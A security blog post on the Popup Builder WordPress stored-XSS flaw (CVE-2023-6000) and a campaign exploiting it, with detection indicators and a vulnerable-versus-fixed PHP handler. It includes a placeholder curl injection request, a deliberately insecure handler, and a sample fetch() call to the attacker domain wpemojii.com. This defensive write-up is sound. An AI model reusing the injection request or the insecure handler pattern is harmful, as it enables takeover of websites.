Overview

On December 11, 2023, a vulnerability in the Popup Builder WordPress plugin was publicly disclosed: an unauthenticated stored cross-site scripting (XSS) flaw that lets an attacker with no account on the site inject JavaScript which is then served to every visitor. In this blog post we share the details of the attack, its implications, and the steps you can take to secure your website. Popup Builder is a popular plugin (more than 200,000 active installs), so a very large number of sites were exposed. We hope most of them have already updated to a patched version, but the real number of affected domains remains unknown.


Key Takeaways

Affected plugin: Popup Builder, versions older than 4.2.3
Fixed version: 4.2.3
CVE ID: CVE-2023-6000
CVSS v3.1: 8.8 (High)
How to prevent the attack: Update the plugin to the latest version immediately!

Understanding the Attack

Discovery

On January 10th, 2024, a malware sample submitted to us revealed how the vulnerability was being exploited in the wild. The payload injected an unauthorized administrator account, paving the way for a complete takeover of the target website. Directly creating a WordPress administrator account, rather than merely abusing the XSS for its own sake, marks a higher level of sophistication than is usual for this class of flaw.

How It Happened

The attacker used a simple but effective technique: an unauthenticated HTTP request that wrote malicious code into the plugin’s “Custom JS” setting for a popup. Because the plugin hands that stored string to the JavaScript `eval()` function when the popup is rendered, the injected code runs in the browser of every visitor. When the visitor is a logged-in administrator, the script runs with that administrator’s session and privileges, and that is what gave the attackers control over the compromised websites.

A request of this shape, sent from a terminal, was enough to plant the code on a vulnerable site (the placeholders stand for the target popup’s post ID and the injected JavaScript):

curl --url 'http://hacked-site.com/' --data 'post_ID=[XXX]&[MALICIOUS_CODE]'
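To make the bug concrete, here is an added illustration of the pattern, not Popup Builder’s own code: a hypothetical WordPress AJAX handler that saves a popup’s Custom JS for any caller, placed beside the same save path with the authorization checks WordPress provides. The action names, function names, post type and meta key are assumptions made for the example; the plugin’s real identifiers are not reproduced here.

```php
<?php
// Added illustration, not Popup Builder's own code. Action names, function
// names, the post type and the meta key are hypothetical. Both versions are
// registered here only so they can be read side by side; a real plugin
// ships only the hardened one.

// BEFORE: the pattern behind an unauthenticated stored XSS. The handler is
// also hooked on wp_ajax_nopriv_, so logged-out visitors reach it, and it
// trusts post_ID and the JavaScript body exactly as submitted.
add_action('wp_ajax_example_save_custom_js',        'example_save_custom_js_vulnerable');
add_action('wp_ajax_nopriv_example_save_custom_js', 'example_save_custom_js_vulnerable');

function example_save_custom_js_vulnerable() {
    $post_id = (int) ($_POST['post_ID'] ?? 0);
    // No login requirement, no nonce, no capability check: anyone who can
    // reach admin-ajax.php overwrites the popup's Custom JS. The frontend
    // later passes this string to eval(), so this is JavaScript execution
    // in every visitor's browser, including logged-in administrators.
    update_post_meta($post_id, '_example_popup_custom_js', wp_unslash($_POST['custom_js'] ?? ''));
    wp_send_json_success();
}

// AFTER: the same save path with the checks WordPress provides. There is no
// nopriv hook, so only logged-in users reach it; the request must carry a
// nonce created with wp_create_nonce('example_save_custom_js'); the caller
// must be allowed to edit that particular popup; and because the stored
// value is executed as script, it is gated on unfiltered_html, the same
// capability WordPress uses for raw script in post content.
add_action('wp_ajax_example_save_custom_js_fixed', 'example_save_custom_js_fixed');

function example_save_custom_js_fixed() {
    // Ends the request with a 403 on a missing or invalid nonce.
    check_ajax_referer('example_save_custom_js', 'nonce');

    $post_id = isset($_POST['post_ID']) ? absint($_POST['post_ID']) : 0;
    if (!$post_id || get_post_type($post_id) !== 'example_popup') {
        wp_send_json_error('invalid popup id', 400);
    }
    if (!current_user_can('edit_post', $post_id) || !current_user_can('unfiltered_html')) {
        wp_send_json_error('forbidden', 403);
    }

    $js = isset($_POST['custom_js']) ? wp_unslash($_POST['custom_js']) : '';
    update_post_meta($post_id, '_example_popup_custom_js', $js);
    wp_send_json_success(['post_id' => $post_id]);
}
```

The three checks are independent and each one alone would have stopped the campaign described here: dropping the `wp_ajax_nopriv_` hook denies anonymous callers, the nonce defeats cross-site requests from a logged-in victim’s browser, and the capability checks keep low-privilege accounts from writing script that administrators will later execute.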

Code Analysis

In the most common variant of the attack, the executed code installed a WordPress plugin written by the attacker. A closer look at the rogue plugin, named “WP Felody”, revealed well-structured, even elegant, source code. The script, embedded in the `body` parameter of a `fetch()` call, ran whenever a user visited the website. Its purpose was to create a rogue admin account that mirrored the legitimate ones and send the credentials to a server controlled by the attacker, who from then on had full control over the hacked website.

How to Check if My WordPress Website Was Compromised?

If you suspect your WordPress website may have been compromised, there are a few signs to check for. One major red flag is a new administrator account with the username `wpx` or the attacker’s email address. This account does not belong to anyone who should have admin access, and its presence indicates unauthorized access. Additionally, check whether a plugin called `wp-felody` has been installed. Attackers install this malicious plugin to gain backdoor access to WordPress sites, so its presence is a clear sign that your site has been breached. If you find either indicator, act quickly to secure your site and prevent further abuse or additional malware from being installed.
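The checks above can be scripted. The following is an added example, not code from the original post or from any plugin: pure PHP functions that look for the three indicators the post names (the `wpx` administrator, the `wp-felody` plugin, and Custom JS that references `wpemojii.com` or calls out to an external host), run here over constructed sample data so it executes offline with the plain `php` CLI. Feeding it a live site’s data through WP-CLI is described after the block and is an assumption about deployment, not something the post describes.

```php
<?php
// Added example, not part of the original post. Pure functions over plain
// arrays so the script runs offline against the constructed sample data
// below; wiring it to a live site via WP-CLI is described in the text.

// Indicators taken from the post: the rogue admin username, the rogue
// plugin slug, and the attacker domain seen in the injected script.
const IOC_USERNAME    = 'wpx';
const IOC_PLUGIN_SLUG = 'wp-felody';
const IOC_DOMAIN      = 'wpemojii.com';

/**
 * @param array $admins    list of ['user_login' => ..., 'user_email' => ..., 'user_registered' => ...]
 * @param array $plugins   plugin file paths as returned by get_plugins(), e.g. 'wp-felody/wp-felody.php'
 * @param array $custom_js list of ['post_id' => int, 'js' => string], one per popup's Custom JS field
 * @return string[] human-readable findings; an empty array means no indicator matched
 */
function find_popup_builder_iocs(array $admins, array $plugins, array $custom_js): array {
    $findings = [];

    foreach ($admins as $u) {
        if (strcasecmp($u['user_login'], IOC_USERNAME) === 0) {
            $findings[] = sprintf('admin account "%s" (%s) registered %s',
                $u['user_login'], $u['user_email'], $u['user_registered']);
        }
    }

    foreach ($plugins as $file) {
        // get_plugins() keys look like "<dir>/<main-file>.php"; compare the
        // directory, and also accept a single-file plugin named after the slug.
        if (strcasecmp(dirname($file), IOC_PLUGIN_SLUG) === 0
            || strcasecmp($file, IOC_PLUGIN_SLUG . '.php') === 0) {
            $findings[] = "plugin installed: $file";
        }
    }

    foreach ($custom_js as $entry) {
        $js = $entry['js'];
        if (stripos($js, IOC_DOMAIN) !== false) {
            $findings[] = sprintf('popup %d Custom JS references %s', $entry['post_id'], IOC_DOMAIN);
        } elseif (preg_match('/\bfetch\s*\(\s*[\'"]https?:\/\//i', $js)) {
            // Not proof of compromise on its own, but Custom JS that calls out
            // to an external host deserves a manual look.
            $findings[] = sprintf('popup %d Custom JS fetches an external URL (review manually)', $entry['post_id']);
        }
    }

    return $findings;
}

// Constructed sample data standing in for a compromised site. The e-mail
// address and the URL path are placeholders, not the real campaign's values.
$sample_admins = [
    ['user_login' => 'siteowner', 'user_email' => 'owner@example.com',    'user_registered' => '2021-03-02 10:00:00'],
    ['user_login' => 'wpx',       'user_email' => 'attacker@example.net', 'user_registered' => '2024-01-09 04:12:55'],
];
$sample_plugins = ['popup-builder/popup-builder.php', 'wp-felody/wp-felody.php'];
$sample_custom_js = [
    ['post_id' => 12, 'js' => "jQuery('#newsletter').hide();"],
    ['post_id' => 37, 'js' => "fetch('https://wpemojii.com/', {method: 'POST', body: '...'});"],
];

foreach (find_popup_builder_iocs($sample_admins, $sample_plugins, $sample_custom_js) as $finding) {
    echo "[!] $finding\n";
}
```

On a live site, run it with `wp eval-file check-iocs.php` after replacing the sample arrays: the administrator list from `get_users(['role' => 'administrator'])` (WP_User objects expose `user_login`, `user_email` and `user_registered`), the plugin list from `array_keys(get_plugins())` (load `wp-admin/includes/plugin.php` first, since that function is not available outside the admin), and the Custom JS strings read with `get_post_meta()` from the plugin’s popup posts; the post does not name the meta key Popup Builder uses, so look it up in your installed version. A match on the first two indicators is a confirmed compromise; an external `fetch()` in Custom JS is only a lead to review by hand.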

How to Prevent the Attack?

Update the Popup Builder plugin to the latest version. Version 4.2.3 and newer contain the fix, as of this writing. For peace of mind, update all your other plugins as well and upgrade WordPress itself to the latest version.

Timeline

  • 7th November 2023
    Details of the vulnerability sent to the Popup Builder team
  • 7th December 2023
    Patch released by the Popup Builder team on version 4.2.3
  • 11th December 2023
    Vulnerability in Popup Builder Disclosed
  • 1st January 2024
    Exploit Proof of Concept released on WPScan
  • 10th January 2024
    Source code used in the injection shared. Malware signature developed.

[Q] How to Spot a Compromised Site?

Check for the `wp-felody` plugin and for an administrator account with the username `wpx` or the attacker’s email address.

[Q] What Sets This Attack Apart?

This attack is more sophisticated than typical XSS abuse: it directly injects a WordPress administrator account. The attacker’s domain, `wpemojii.com`, points to an exploitation campaign that has been running since December 2023.